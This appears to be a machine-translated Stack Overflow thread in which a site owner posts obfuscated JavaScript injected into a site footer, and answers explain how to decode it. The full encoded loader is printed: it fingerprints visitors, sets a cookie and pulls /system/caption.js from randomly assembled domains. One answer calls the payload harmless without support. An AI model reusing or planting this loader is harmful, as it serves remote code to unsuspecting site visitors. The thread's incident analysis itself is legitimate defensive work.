Décoder certains injecté Javascript?
J'ai eu la suite injecté dans le pied de page du site de la mine et, dans un effort de résoudre le plus grand mystère ("Comment" c'est arrivé), je suis en train de le décoder. Des idées?
Voici le code:
<ads><script type="text/javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%6D%79%61%64%73%2E%6E%61%6D%65%22%2C%22%61%64%73%6E%65%74%2E%62%69%7A%22%2C%22%74%6F%6F%6C%62%61%72%63%6F%6D%2E%6F%72%67%22%2C%22%6D%79%62%61%72%2E%75%73%22%2C%22%66%72%65%65%61%64%2E%6E%61%6D%65%22%5D%2C%65%3D%5B%22%76%61%67%69%2E%22%2C%22%76%61%69%6E%2E%22%2C%22%76%61%6C%65%2E%22%2C%22%76%61%72%73%2E%22%2C%22%76%61%72%79%2E%22%2C%22%76%61%73%61%2E%22%2C%22%76%61%75%74%2E%22%2C%22%76%61%76%73%2E%22%2C%22%76%69%6E%79%2E%22%2C%22%76%69%6F%6C%2E%22%2C%22%76%72%6F%77%2E%22%2C%22%76%75%67%73%2E%22%2C%22%76%75%6C%6E%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%6F%6C%79%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%73%79%73%74%65%6D%2F%63%61%70%74%69%6F%6E%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));</script></ads>
J'apprécie toutes les réponses. J'ai nettoyé, et garder un œil pour plus d'.
OriginalL'auteur Jonathan Wold | 2010-08-02
Vous devez vous connecter pour publier un commentaire.
Vous pouvez décoder la chaîne à l'aide de cet outil. Ensemble de la chaîne de conversion d'options de URL et Décoder. Ensuite, vous pouvez très il avec js formatage automatique de la requête.
Et parce que je suis curieux, j'ai pris un coup d'oeil à la sortie. C'est l'écriture d'un nouveau
caption.js
fichier à vos pages à partir d'un semi-aléatoire de domaine. Il y a 2 tableaux de l'URL de segments qui sont utilisés pour construire le plein de domaine, donc je dirais que vous avez quelque chose pour aller avec.OriginalL'auteur Pat
Donc, ajoute un sous-domaine de
e
(par exemplevagi.
) à un nom de domaine à partird
(par exemplemyads.name
) et les charges d'un script à partir de/system/caption.js
à ce domaine (par exemple,http://vagi.myads.name/system/caption.js
).OriginalL'auteur Jordan Running
code est en cours de chargement aléatoire sous-domaine-sld combo avec un cookie ensemble, pour charger du contenu non sécurisé.
OriginalL'auteur Rixius
Tous ces nombres sont des valeurs hexadécimales pour les caractères ASCII. Quand ne pas encoder est appelé ils sont transformés en personnages réels. par exemple, %3C est " <".
Pourquoi ne pas utiliser une boîte de message pour afficher le résultat de ne pas encoder(...)
OriginalL'auteur Matt Breckon
Vous pouvez utiliser le sortilège de décodeur ici:
http://home2.paulschou.net/tools/xlate/
Le code est
OriginalL'auteur Chris Foster
OriginalL'auteur Borealid
Voici un URLDecoder:
http://meyerweb.com/eric/tools/dencoder/
Et le code qu'il écrit:
OK, donc c'est pas trop utile. Il apparaît pour insérer un autre fichier JS si l'utilisateur ne dispose pas d'un cookie nommé "holycookie" et n'est pas le bot de google. La plupart de qui est juste ordure de choisir le nom de domaine pour obtenir la charge utile de.
OriginalL'auteur user409021
Le code que vous avez posté décode à
qui à son tour en charge de code à partir d'une url composé dans un pseudo-aléatoire façon que si la condition est remplie.
Si vous ouvrez, par exemple, http://vain.adsnet.biz/system/caption.js vous serez présenté avec le code javascript suivant.
Je laisse l'interprétation, cependant, il semble tout à fait inoffensif.
Comment avez-vous pu faire cela sur votre propre? URLDecode + jsbeautifier ou jsunpack sont plus que suffisant pour obtenir ce bien 😉
OriginalL'auteur em70
Utilisation "de Contrôle de Version", de sorte que cela n'arrive pas dans l'avenir. Après une bonne construction est terminée, et tout est comme vous voulez, de l'enregistrer sur un disque dur externe alors que vous êtes en mode hors connexion.
Avez-vous récemment faire quelque chose de bouleverser un collègue qui est un programmeur?
OriginalL'auteur Dane Hart
Utilisé la fonction php rawurldecode
OriginalL'auteur Wifi Cordon